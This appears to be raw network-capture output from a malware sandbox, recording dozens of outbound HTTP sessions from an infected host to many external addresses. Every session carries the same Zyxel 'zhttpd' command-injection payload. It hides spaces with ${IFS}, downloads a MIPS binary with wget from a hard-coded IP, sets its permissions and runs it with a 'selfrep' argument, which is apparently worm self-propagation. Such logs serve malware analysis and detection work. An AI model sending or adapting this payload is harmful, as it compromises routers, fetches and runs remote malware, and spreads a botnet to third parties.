                                            Jan 14, 2024 15:50:29.247061014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1497192.168.2.2355884212.78.161.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247102022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1498192.168.2.235695848.42.190.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247107983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1499192.168.2.2338776222.242.84.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247123957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1500192.168.2.234132860.62.181.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247154951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1501192.168.2.234208665.105.62.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247168064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1502192.168.2.233491852.254.8.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247174025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1503192.168.2.2341446204.47.2.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247188091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1504192.168.2.2344536194.203.62.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247189999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1505192.168.2.2354708195.106.83.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247226954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1506192.168.2.2353160202.223.181.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247263908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1507192.168.2.234251893.224.89.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247288942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1508192.168.2.2337200101.103.190.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247323036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1509192.168.2.2348010107.107.47.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247350931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1510192.168.2.233566837.86.9.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247380972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1511192.168.2.235270641.200.46.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247401953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1512192.168.2.2337152186.249.220.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247428894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1513192.168.2.2357076124.26.87.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247442007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1514192.168.2.233541651.69.90.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247450113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1515192.168.2.235380896.210.235.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247502089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1516192.168.2.23351868.89.110.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247524023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1517192.168.2.2335090216.230.207.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247558117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1518192.168.2.2354854118.225.230.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247559071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1519192.168.2.2342654203.42.117.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247574091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1520192.168.2.234382058.215.113.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247608900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1521192.168.2.2343082202.174.207.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247621059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1522192.168.2.235685663.94.27.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247668028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1523192.168.2.235388636.253.81.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247711897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1524192.168.2.233283212.91.209.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247714043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1525192.168.2.235308887.251.170.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247754097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1526192.168.2.233954897.119.193.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247776031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1527192.168.2.2351146106.200.39.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247792959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1528192.168.2.233450023.81.67.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247828007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1529192.168.2.2347022165.136.129.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247850895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1530192.168.2.233314053.210.152.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247869968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1531192.168.2.233478635.147.118.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247880936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1532192.168.2.2350032163.153.95.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247903109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1533192.168.2.2337904203.180.195.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247925997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1534192.168.2.2344270120.95.202.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247961044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1535192.168.2.234921242.51.52.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247993946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1536192.168.2.2347166130.100.85.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248008966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1537192.168.2.234132467.13.217.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248024940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1538192.168.2.233943094.225.184.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248049974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1539192.168.2.2337198152.28.73.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248075962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1540192.168.2.235536212.147.188.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248130083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1541192.168.2.2353024207.186.129.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248145103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1542192.168.2.2348538182.180.218.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248161077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1543192.168.2.235061481.87.217.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248191118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1544192.168.2.2349796111.105.5.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248214960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1545192.168.2.233856287.219.168.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248259068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1546192.168.2.2349626157.235.188.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248274088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1547192.168.2.235798692.25.38.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248316050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1548192.168.2.2355586126.138.65.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248349905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1549192.168.2.235329878.59.39.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248373985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1550192.168.2.2359596219.184.75.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248404980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1551192.168.2.2339780194.183.210.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248404980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1552192.168.2.2336702198.244.206.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248440981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1553192.168.2.2350232103.37.34.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248476982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1554192.168.2.2345482125.32.58.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248491049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1555192.168.2.234088246.245.230.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248518944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1556192.168.2.235746674.145.74.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248558044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1557192.168.2.2339778162.245.232.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248595953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1558192.168.2.233359685.56.7.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248603106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1559192.168.2.2332792171.152.112.0443
                                            TimestampBytes transferredDirectionData
